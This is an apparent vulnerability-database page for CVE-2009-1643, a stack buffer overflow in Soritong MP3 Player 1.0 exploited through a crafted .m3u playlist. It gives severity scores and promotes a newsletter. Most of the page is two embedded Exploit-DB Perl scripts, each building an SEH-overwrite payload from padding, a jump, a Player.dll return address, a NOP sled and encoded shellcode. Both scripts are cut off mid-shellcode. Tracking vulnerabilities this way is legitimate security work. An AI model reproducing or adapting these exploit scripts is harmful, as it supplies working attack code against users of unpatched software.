CVE-2009-1643
published 2009-05-15CVE-2009-1643: Stack-based buffer overflow in Sorinara Soritong MP3 Player 1.0 allows remote attackers to execute arbitrary code via a crafted .m3u file.
PriorityP344critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.82%
92.2th percentile
Stack-based buffer overflow in Sorinara Soritong MP3 Player 1.0 allows remote attackers to execute arbitrary code via a crafted .m3u file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sorinara | soritong_mp3_player | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow
exploitdb·2009-09-01
CVE-2009-1643 Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow
Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow
---
#!/usr/bin/perl
# by hack4love
# [email protected]
# Soritong MP3 Player 1.0 (.m3u//UI.txt) Universal Local BOF (SEH)
###############################################################################
# Original exploit:::http://www.milw0rm.com/exploits/8624
# by Stack
####(m3u file)#################################################################
my $bof="\x41" x 260;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x47\x30\x01\x10";##Player.dll
my $nop="\x90" x 2000;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x
Exploit-DB
Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)
exploitdb·2009-05-07
CVE-2009-1643 Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)
Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)
---
#!/usr/bin/perl
# Soritong MP3 Player 1.0 Seh Overwrite Exploit
# http://www.sorinara.com/soritong/soritong10.exe
use strict;
use warnings;
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x5
2009-05-15
Published